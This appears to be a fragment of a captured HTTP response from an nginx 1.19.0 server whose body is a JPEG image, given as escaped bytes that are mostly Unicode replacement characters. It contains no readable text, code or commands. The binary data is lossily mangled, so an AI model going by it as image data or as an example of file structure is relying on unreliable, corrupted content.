nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0001\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000/\\u0011\\u0000\\u0001\\u0003\\u0002\\u0005\\u0001\\u0007\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0011\\u0005\\u0012!1A\\u0013Qaq\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0006\\ufffd\\u00142\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u001a\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdV\\u0015\\ufffd\\ufffdgQ\\ufffd%XmƲ \\ufffd\\ufffdTg6\\ufffdru\\ufffdƲ0\\ufffd\\ufffdG\\n\\u003e2y\\ufffd\\ufffdd\\ufffdEV\\u0019m}3\\ufffd1\\ufffd\\ufffd\\u003c*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqY\\u0016`\\ufffd\\ufffdd\\ufffd\\ufffd6\\ufffdk\\\"\\ufffdw\\ufffd\\ufffdr\\ufffd{0\\ufffdqY.\\ufffd\\ufffd\\u0019*\\u003e3\\ufffd\\ufffdF\\u001e\\u0013u\\ufffd\\u000c\\ufffd\\u000f\\u0018\\ufffdDu2i\\ufffd\\ufffdh.\\ufffdH\\ufffd2\\ufffd\\ufffd\\t\\u0019^Ӗ\\ufffd.z*\\ufffdJ\\ufffd\\ufffd\\u001d\\u0014\\u0002\\ufffd@2ء\\u0012\\t\\u0018=\\ufffd+\\u0012T\\u00176.\\ufffd-\\ufffd\\ufffdEcZA\\u0012,\\ufffd*\\ufffd!\\t\\u0003o\\u0007\\ufffd:\\ufffd\\u003c\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\ufffdFh\\ufffdu\\ufffd'\\u000b\\u00086\\u0001\\u0026\\ufffd\\u0003\\ufffd\\ufffd\\u000c4\\r\\ufffd|\\ufffdӼ\\ufffd@\\u0005\\ufffd\\ufffd\\u003e[$LL\\r2Ѡ\\ufffd\\ufffd\\ufffd\\u0000\\u0019ƈ\\ufffd\\ufffd\\ufffdӅ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffd=N\\ufffd\\ufffd2\\u003ct\\ufffdR\\ufffd*Xr\\ufffdr\\ufffd\\u001d8?+\\u000b\\ufffd#2H\\ufffd\\ufffd1\\ufffd\\u0012D\\ufffdሠ\\u0006\\ufffd6\\ufffd9\\u0006\\ufffdo\\ufffd}\\ufffd\\u0001`ֻV\\ufffdV\\u000c\\ufffd\\ufffd\\ufffd./c\\ufffdY\\ufffdp\\ufffd\\ufffd4\\ufffdz\\u000fH\\ufffd\\u0011V\\n\\ufffd\\ufffd\\u001b\\ufffd\\ufffdu\\ufffd\\u0012)X\\u0005\\ufffdn\\ufffd\\ufffd:\\ufffd\\ufffdaU\\u0004\\ufffd\\ufffd\\r?\\ufffd?\\ufffd\\u0008\\ufffd\\rm^\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\r}\\ufffd\\ufffd\\nF\\ufffd\\u0019\\ufffd\\ufffdI\\u0004J\\ufffd\\u0015:\\ufffd\\u0003\\ufffdd\\ufffd?\\ufffd\\ufffdSϬ\\ufffd\\ufffd$!\\ufffdj\\u0004\\ufffd6\\ufffd_\\ufffd_\\u001fk\\ufffd\\r\\u0000\\\\\\ufffd\\ufffdUM4\\ufffd(\\u0008\\u0016\\u0017$\\ufffd\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdx$\\u000e\\u0019\\u0003q\\ufffd#ʚ\\ufffd\\u003e\\ufffd+\\u001a9\\ufffd3\\ufffd;V\\ufffd\\ufffd8\\ufffd\\ufffdc\\ufffd\\ufffdLz\\u0007Ӽ\\ufffd6\\ufffd53\\ufffd\\u0012\\ufffdeZ8\\t4\\u0018\\ufffd\\ufffd\\ufffdJ\\ufffd\\u001c\\u000e\\ufffd\\ufffd4\\ufffd@\\ufffd\\ufffdM\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\u0005EF\\ufffdr9*H\\ufffd(qV\\u000b\\ufffd\\ufffd\\ufffd,\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd%\\ufffd \\ufffd\\u0006\\ufffdB\\ufffdp\\ufffd\\u0004\\ufffd1b\\u0010\\ufffd\\ufffdj9$\\ufffd}?\\ufffd\\ufffd\\ufffd,[M\\ufffd\\ufffd\\ufffd\\u0001\\u001b\\ufffdkQ\\u001dױ\\ufffd`\\ufffd+l\\ufffdiqf\\ufffd\\ufffd\\ufffd\\ufffdWw\\ufffd%+\\u0018\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd$\\ufffdp/8󿡣\\ufffd@\\ufffd\\ufffd\\ufffdr\\ufffdE\\ufffdk\\u001d\\ufffd6\\u003c\\ufffd\\u0008\\ufffd\\ufffdc\\u0006\\ufffdIYX\\ufffd\\ufffd\\ufffd/\\ufffdq\\ufffd\\ufffdR:\\u0018\\ufffd5\\n^%e\\u001eǐ\\ufffd\\u0007\\ufffd\\ufffdU}\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffdR\\ufffd\\ufffd)\\u0000\\u0012H\\ufffd\\ufffd\\u0000\\r\\ufffd\\ufffd\\ufffd\\u003c\\ufffd9\\ufffd\\u0026\\ufffdW\\ufffdI6\\ufffd?a?9\\ufffd\\ufffd\\ufffd!\\ufffduR\\ufffd\\u0000\\ufffd51\\u003e\\ufffd\\u000e\\ufffd\\ufffd\\u001e\\u001dDl-8;ā\\ufffd\\ufffd\\ufffd\\ufffd\\u00006\\u000f?B\\u0000\\u001b\\\\n\\ufffdjꧠ\\ufffd\\ufffdq~c\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\ufffd$SH\\ufffd\\u00132L\\ufffd@\\ufffdW\\ufffd*ё\\ufffdf\\ufffdz\\ufffd\\ufffd\\u0000+\\ufffd\\ufffdm9\\ufffd\\ufffd\\ufffd\\u0014\\ufffdb*\\ufffd\\ufffdV\\ufffdZ4o\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\u001a\\ufffdٷJʭ\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000ex\\ufffd\\ufffd\\u001b\\ufffd(\\ufffd\\ufffd%\\ufffd;+\\ufffd\\ufffdU0\\ufffd\\ufffdXKo\\ufffd\\ufffd\\ufffdhi\\ufffd\\r4~\\ufffd\\ufffd~`\\ufffd\\ufffd(b»\\ufffdz׎\\ufffd\\ufffd\\ufffd\\ufffdh@`\\ufffd\\ufffd\\ufffd6\\ufffdeGݶ\\ufffd\\u0000\\ufffdV\\u0008\\ufffd\\u0005\\ufffdʦ\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd\\r\\ufffd;\\ufffd\\u001d\\t\\ufffd\\u0000@\\ufffd\\ufffds\\ufffdC\\u0014r\\ufffdR3\\u001f\\ufffd\\ufffd2\\t\\u0014i\\ufffd\\ufffd\\ufffdTG\\ufffd:\\u0010\\u0008\\ufffd\\ufffd\\ufffdB\\ufffd'\\ufffd(\\\\e\\ufffdp\\ufffd |\\ufffdR\\ufffd.\\ufffd\\u000b\\ufffd\\ufffd\\ufffdt\\u0005\\ufffd\\ufffd\\u0002C\\ufffd\\ufffd7\\u0016\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\u0007M\\ufffdE$,\\ufffd\\u0026\\u0014\\u000e\\ufffd\\u003c\\ufffd\\u0007\\ufffd\\ufffd\\u001d\\t\\ufffd4\\ufffdJҼ\\ufffd~\\ufffd\\ufffd9jC,d\\ufffdف\\u001c\\u0001\\ufffd;\\ufffd\\u0000]\\ufffd\\u0007kZ߇\\ufffd\\ufffdP\\ufffd\\ufffd\\u0015\\ufffd2\\ufffd(k\\ufffd\\ufffd/\\ufffd\\u0011\\ufffdM\\ufffd\\ufffd\\ufffd:\\ufffdd\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd林ԝ\\ufffdCpX\\ufffd\\ufffd8\\ufffd/\\ufffd\\u0016\\u003c\\ufffd\\u001c\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdkkb\\ufffdu\\u0011G/\\ufffd^O\\ufffdT\\u0014x\\ufffd}Gׯ\\ufffdŠ\\ufffdsJ\\u0015\\ufffde\\n\\ufffdw\\ufffdZW\\u0000\\ufffd\\r\\u001e/\\ufffdW{]{\\u0005\\ufffd\\ufffdUQ22]a}{\\ufffd\\u003e]OK\\ufffd\\ufffdF\\ufffd*D\\u0026\\ufffd7;\\ufffd\\ufffd{\\ufffd\\ufffdQ\\u0010\\ufffd\\ufffd\\ufffdC\\ufffdP\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffdv(\\u0001\\ufffd\\ufffdO8\\ufffdZWi\\ufffd\\ufffd\\u0001i#4֥A\\ufffdш\\ufffd\\ufffdsW]\\ufffd\\ufffd\\u0013$\\ufffd4N\\u001fiV\\ufffdn\\ufffd\\u0006\\u001c\\ufffd\\ufffd\\u0010~\\ufffd\\ufffd9#\\u0001:\\u0015F\\ufffdH\\u0003\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdA%\\ufffd\\ufffdx\\ufffd\\ufffd\\u000fw5\\ufffd\\ufffd\\ufffd\\u0003*\\ufffd\\u0003\\u0016\\ufffdIY\\ufffdHY\\u001byqE@\\ufffd\\ufffd5\\ufffd\\ufffdo\\ufffd۾\\ufffd\\ufffd\\u0012(U_dP\\ufffdV4-)$\\ufffdJ,\\ufffdl\\ufffd\\\"\\ufffd\\ufffdךˌ\\r,pƞ\\ufffds\\ufffd\\ufffd\\ufffd\\u00197B\\ufffd\\ufffd-\\ufffdC\\ufffdm\\ufffd\\ufffd\\u000f\\u0016\\r\\ufffd\\ufffdB\\ufffdf\\ufffd\\u001b\\u0014\\ufffd\\ufffd\\ufffd\\ufffd\\u001fE\\ufffdڄ\\ufffd\\ufffd\\ufffd\\ufffd18\\ufffd\\ufffd\\u001d\\ufffd\\ufffdUoU\\ufffd\\ufffd\\\"\\ufffdоؤӳ0\\u0006\\ufffdp3cT\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd5\\r$6x\\ufffd\\u0010z\\ufffd\\u0026ʶ\\ufffdTh\\u001a#\\ufffdV-\\u0002j\\u0002\\u0015\\u0005\\t\\ufffd\\ufffd\\t\\u0014M_#\\ufffd\\u001b\\u0000\\ufffd\\u0005\\u001e/+\\ufffdóJ\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffd\\ufffd%\\ufffdK\\ufffd\\ufffdR\\ufffdF\\ufffd*\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffdhi\\ufffd%d\\ufffd4\\ufffdEz\\ufffd\\u0015BG\\ufffd\\u0006\\ufffd5`t\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffd\\u0000\\ufffdI\\ufffd\\u000eù\\ufffd9\\u003ce\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdxԊfQVv\\ufffd@\\ufffd]\\ufffd\\ufffdxÂ\\ufffd\\ufffdzI\\ufffd\\ufffdc\\ufffd\\u0005u\\ufffdA#*:\\ufffdB\\u0003Q\\ufffdM\\u0003G\\ufffdDgSB\\ufffd\\ufffd\\ufffdޑ3\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u0001\\ufffdy\\u0000\\u0001\\ufffdt錬\\n\\ufffd$\\ufffd\\ufffd]\\u0001\\u0004\\ufffdˎ\\ufffdx\\ufffd\\t\\ufffd\\ufffdY\\ufffd\\u0002\\ufffd\\ufffd:d\\u001a\\ufffdA\\u0010\\ufffdf\\ufffd\\u001c\\ufffd-\\ufffd{\\ufffd-tv݁\\ufffd\\ufffd\\ufffdV2\\ufffd.W5Y\\ufffd\\u0018\\u000bKέ\\ufffd\\ufffd,yt蓕\\ufffdU\\ufffd\\ufffdfP\\ufffd[\\u0000o\\ufffd]\\u0001aۥu'\\u0011\\u0012)\\ufffd\\ufffd+\\u0017ݹ\\u001c8*\\u0008,\\u0008\\ufffd{w\\u0007\\ufffd\\ufffd\\ufffdI\\ufffd]\\u0013Țy\\ufffd\\u0012eYD\\ufffdC!dV\\u001e\\ufffd\\t5\\ufffdA\\ufffd\\u0002\\ufffd\\ufffd\\u000eT\\ufffdB}k\\ufffd\\ufffd1\\ufffd2\\ufffdK\\u001f\\u0014\\ufffd\\ufffd.k\\\\30\\ufffd\\ufffdF.ڗ\\u0008ݭ\\ufffd}\\ufffdj\\ufffd,o\\ufffd[\\u0013\\u001b\\u001c\\ufffd\\u001a\\ufffd\\u003cQʂ\\ufffdov]\\ufffd`\\ufffdn\\ufffd\\ufffd\\u0012mH\\ufffd\\ufffd^\\ufffd古T\\ufffd|r\\ufffd\\ufffd]\\ufffd\\u0002O\\u0015\\ufffdu'\\ufffd\\u0000\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$\\ufffd\\u00166\\ufffdrgK\\ufffd\\ufffd]\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\n_;\\ufffd\\u0000\\ufffd\\u0000}\\ufffd\\r\\ufffdj\\u0010\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsn\\ufffdN\\ufffd]\\ufffd\\ufffd뷋\\ufffd\\ufffdL\\ufffdL\\ufffdE\\u0014Q\\ufffdWolq\\ufffdv\\u0002\\ufffd/h#ڶ;\\ufffd\\ufffdrT\\u001b\\ufffd\\ufffd\\ufffd\\ufffd1X\\ufffd{I{@\\ufffd\\ufffdd\\ufffd\\ufffdd\\ufffd\\u000fóG\\ufffdD\\ufffdj\\ufffd(Ν\\ufffd\\ufffd\\tm\\u001f1a@\\ufffd\\ufffdr7X\\r^E\\ufffd@\\ufffdt\\ufffd!\\ufffdU\\ufffd+\\u001bI\\ufffd\\ufffdGP\\u0019\\ufffd\\nwn\\ufffd\\ufffd\\u0010\\u000f\\u001b\\ufffdb\\u000fZ 篡\\ufffdӟO\\u003c\\ufffd\\ufffd\\ufffdbd(\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdn\\ufffd\\ufffdo\\u001b\\ufffd\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7z\\u0016#\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdfe^\\u001a\\ufffd\\ufffd\\ufffd.kYrQ\\ufffd4E\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\u001c\\u0002NԠ\\ufffd\\u0010\\ufffd\\ufffd$w\\ufffd\\ufffdO\\ufffd0$\\u0012\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd.\\ufffdlR\\ufffdc\\ufffdH5\\ufffd\\ufffd\\ufffdŬ1\\ufffd\\ufffdY\\n\\ufffd\\u0006\\ufffd\\\\\\u0005\\u0003\\ufffd_\\u003c\\ufffdn\\ufffd՞2\\ufffd\\ufffd'u\\ufffd84s\\ufffdB\\u001a\\ufffd\\ufffdi\\ufffd\\ufffdJ\\u0002\\ufffd*\\ufffdGI1\\ufffda\\u0011\\ufffd6\\ufffdT\\ufffd\\ufffd\\u000b*\\ufffd\\u000bW\\ufffd\\u001f\\ufffd~\\ufffd\\ufffd\\ufffdP`\\ufffd\\ufffdP\\ufffd\\ufffdۻ1w\\ufffd\\ufffdfbI\\ufffd9\\ufffd\\u0000\\ufffd\\ufffdh\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\u0015QI\\u0026\\ufffd\\u0001G=z\\u0000\\u003c\\ufffd\\ufffd\\u0015_\\u0012\\ufffdi\\u0001/c@\\ufffd\\ufffdZS\\ufffdH\\ufffd\\ufffdb\\u0012\\ufffd\\ufffd\\u0018\\ufffdK\\ufffd`R9w,G\\u0000\\u0002\\r_S\\ufffd\\ufffd\\ufffdK\\ufffdַZ\\ufffd\\u0000\\ufffd~!9\\ufffd4\\ufffd\\ufffd5Dc܇jPF\\u001cݐ\\ufffdl}\\ufffd{4\\ufffd\\ufffd\\ufffd锉\\ufffd\\ufffd*fm\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd׻h\\u0015f\\ufffd\\ufffd\\u0019{z!\\ufffd\\ufffd\\u001d8W`_\\ufffd\\ufffd\\ufffd\\u0005\\ufffdW`C\\ufffd\\ufffdo\\ufffd=M\\ufffd\\u000cG\\u000fu`\\u0001\\ufffd\\ufffd\\ufffd\\u0010\\u0019%\\u003c\\ufffd\\ufffdfk\\ufffd\\ufffd\\ufffd\\ufffdI/\\ufffd4_\\u0001\\ufffd/\\ufffdf_\\ufffd,(\\ufffdHǫРM\\ufffd=\\u0005\\ufffd?z\\ufffdmY;\\ufffd\\ufffd\\ufffd\\ufffd\\t\\nzu\\ufffd\\ufffd篃]\\u000em|GYꬔ\\ufffdB\\ufffd%MY\\u0000՟\\u0000\\ufffd\\u0017]\\u003c\\ufffdkkUQ\\u0015\\ufffd\\ufffd\\ufffdV76\\ufffdD\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdp\\ufffdM\\u0010!\\ufffd\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffdJ\\ufffd[\\ufffd;\\u001b\\u0004_RB\\ufffd#\\u0005\\ufffd\\ufffd@\\ufffd\\ufffd \\ufffd=8$_\\ufffdp\\ufffdY\\nV\\ufffd2\\u0016\\ufffd%\\ufffd\\ufffd\\u0007\\ufffd\\ufffdyѨgӘ\\r\\u0018\\ufffd=7W\\ufffd\\ufffd\\u001f\\ufffd\\u0016\\ufffd|\\u001b=1\\ufffd\\ufffdb\\ufffd+\\ufffd\\u003c\\ufffd\\ufffd \\u003cO\\ufffdj\\ufffd\\u0003V玎\\ufffd+~\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd?\\u0010O,_\\ufffd\\ufffd'\\ufffd\\ufffdC\\u001bN\\ufffdb\\ufffd\\u003c\\ufffdn\\n\\u0018\\u0000\\ufffd\\ufffdn\\ufffd\\ufffd\\u0018\\ufffd\\u0015d_\\u0000\\ufffd\\ufffdN\\u0011\\ufffd\\ufffd;\\ufffd\\u000cȼ\\ufffd\\ufffd\\ufffd͑\\ufffd\\ufffd{4\\ufffdtq\\ufffd:HF\\ufffdI57\\\"\\ufffd\\u000c\\ufffd\\u0013a\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd'$\\ufffd\\ufffd\\ufffd\\u0019cy^\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u001e6\\ufffd^E\\ufffd\\u000e_\\ufffd\\ufffd\\ufffd\\ufffdru\\ufffd\\ufffdLa\\ufffd\\ufffd\\u0019\\ufffd6\\ufffd\\r\\u0005t$\\u0017b\\ufffd\\u0016\\ufffdkn9\\ufffdU\\ufffd\\ufffd\\ufffd?\\ufffdU\\ufffdm\\ufffd\\u0015\\ufffd\\ufffdO5|\\ufffdz#\\ufffd\\ufffd;.\\ufffd\\ufffdԚ\\ufffdi*\\ufffd\\ufffd\\ufffdv\\ufffdb\\u0005\\ufffd ]mcԟq\\ufffd\\u0000\\ufffd\\u000c\\ufffdl\\ufffd\\ufffd\\t%E\\ufffd\\u0000\\u001c\\ufffd'?\\ufffd\\ufffdO\\u0007\\ufffd'\\ufffd\\ufffd)\\ufffdњ8\\ufffd\\u000b\\ufffdu\\u0006\\ufffdY\\ufffd\\ufffd\\ufffdnQ\\ufffdߥ\\ufffd9\\ufffd\\ufffd\\u0002\\r\\n\\ufffd\\ufffdW\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdu\\ufffdqFY\\ufffd)U\\ufffdn\\ufffd\\ufffd\\u0002\\ufffd\\ufffdӽ\\u000b$\\ufffd,~f#(t\\ufffd\\ufffd87\\ufffd\\ufffd\\ufffdG\\u003e*\\ufffd}z\\ufffd\\ufffd/{\\ufffd@5S\\ufffd\\ufffdz\\u0016\\ufffd\\n\\ufffd!f\\ufffdH\\ufffd\\u0019\\u0002m\\u000c\\ufffd6\\ufffd\\ufffdn\\ufffd\\u001b`\\u0005\\ufffdNVȻ\\u0013\\ufffd9\\u0004\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd7W\\ufffd\\u0000,\\ufffd,\\ufffd\\ufffd_zG\\u000cP@\\ufffd!\\ufffd\\u0004h\\ufffd\\ufffd\\n\\u0005\\u0001}\\ufffd;\\ufffdp\\ufffd,\\ufffd\\ufffdd\\ufffd\\ufffdZ\\ufffdO\\u0003\\ufffdj\\u003c\\ufffdt\\ufffd\\u0008\\ufffd\\u0000A2\\u001a\\ufffd\\u0013|u\\ufffd+\\ufffd\\ufffd*\\ufffdS\\ufffdԐ\\u0011\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffd?A\\ufffdV2\\t\\ufffd,\\ufffd\\u0015\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdA\\ufffdZy\\ufffd\\ufffd\\ufffd\\ufffdd'k*\\ufffd-\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\u0016E\\ufffdS\\u0011C\\u000b\\ufffd%\\ufffd\\ufffd\\ufffd_\\ufffd}\\ufffd50j\\u0016#\\ufffdi\\ufffdƀ\\ufffd\\ufffd\\ufffdW\\ufffdU\\ufffd\\ufffdj\\ufffdy\\ufffd1\\u000b\\u0006\\ufffd\\ufffd\\u0013\\ufffd\\ufffd$\\ufffd\\ufffd2Q\\ufffduA\\ufffd\\ufffdP\\ufffd\\ufffdI\\ufffd2\\u0000i=\\ufffd\\u001b\\ufffd\\ufffd\\rq\\ufffdh\\ufffdP+\\ufffd\\t\\ufffd\\ufffd$\\ufffd\\ufffd\\r$\\ufffd\\ufffd\\ufffdx\\ufffd`\\ufffd\\ufffd\\u0001\\u0007\\ufffd\\u0004U\\ufffd\\ufffd\\ufffd\\ufffdp\\u0004E\\ufffdԄt8\\ufffdDl!\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd%\\ufffdj\\u0026\\ufffd\\u001eÓҸ\\u001c\\ufffd\\u0005\\ufffd\\ufffduh\\ufffdeT\\u0008y\\ufffd\\ufffdہ\\u0016v\\ufffd\\ufffd]\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffdk\\ufffd^\\ufffd\\ufffd/#6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\u0008\\u0015`\\u0002\\u0000\\ufffdx\\u0007\\ufffd8\\ufffd{\\u003c\\ufffd\\u0007\\u0006\\ufffd\\u0015\\ufffd\\ufffd\\ufffdZD\\ufffd\\u0002Á\\ufffdZ\\ufffdYv\\ufffd3X\\ufffdx\\ufffd]\\ufffd\\u000b9:v\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\u001fo\\ufffd\\ufffd*\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl'\\ufffd\\ufffd\\ufffd\\u0015d\\ufffd)\\ufffdXC\\ufffd\\ufffd\\ufffd\\ufffdA?\\ufffd[\\ufffd;\\u001e0̆\\ufffd\\u0006\\ufffd\\ufffd\\ufffd{$\\ufffd:\\u0011~E\\ufffd\\u001eˌE_\\ufffd:\\ufffdcd\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd@\\t x\\u001f\\ufffdZX\\ufffd0\\ufffd\\ufffd\\ufffdr\\u0008\\ufffd\\u000b\\u0026\\ufffdX5q\\ufffd\\ufffdW\\ufffd\\ufffd\\u00114!Ķ(\\u000b\\ufffdP\\ufffd\\u0015\\ufffd\\u0000!`\\ufffd\\u000cQP\\ufffd\\ufffd\\u0016]\\ufffd\\ufffd\\ufffdS@(n\\ufffd\\u0015\\u003c\\ufffd?sB\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd=\\u001e,\\ufffd\\u0026\\ufffd63\\ufffd\\ufffd׿mO\\ufffdȅ\\t \\u0000I\\ufffdC\\u001c\\ufffd\\ufffd\\u0010\\ufffdɽ\\ufffdŀ꠆\\ufffdu\\u0004\\u001a\\ufffd#\\ufffd\\ufffd|\\ufffd`j\\ufffd\\ufffdT\\ufffd\\u0014h\\ufffd1=\\ufffd\\u0004W ݃\\ufffd\\u0026󷦱\\ufffdfU\\u0014\\u000b\\ufffd\\ufffd#\\ufffdO'\\ufffd\\ufffd\\u0000F\\ufffd\\u003ey\\ufffd\\u0013\\ufffd1\\ufffd\\ufffd\\ufffd|\\ufffd\\u0026U\\u0004\\ufffd`,{\\ufffd\\n8\\u0000\\ufffdg\\ufffd$\\ufffd\\ufffd\\ufffdN\\ufffd!sjň\\u00062\\ufffd]\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000Uu\\ufffds\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd`t%\\ufffdT\\ufffd\\u001bzr\\ufffd\\ufffd\\ufffd\\u001bd$h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd鿱Q\\ufffd\\ufffdZ2\\ufffd\\ufffdJ\\ufffdE3\\ufffd\\u0000.\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\njd3\\u0015\\ufffdL\\ufffd\\ufffdR\\ufffdE\\ufffd\\ufffdd\\ufffd\\u001cw\\u003cp:_$N҅\\ufffdNc\\u0006\\ufffd\\ufffd\\nO\\ufffd\\ufffd\\ufffdT\\ufffd5\\u0008\\ufffdG#iF\\ufffd\\u0011?.\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdY\\ufffdy\\u001c\\ufffd̞h*gf\\u0014\\ufffd3-\\ufffdN\\ufffd\\ufffd#B;\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdb\\u00074t\\ufffdE\\ufffdP\\ufffdʦ3 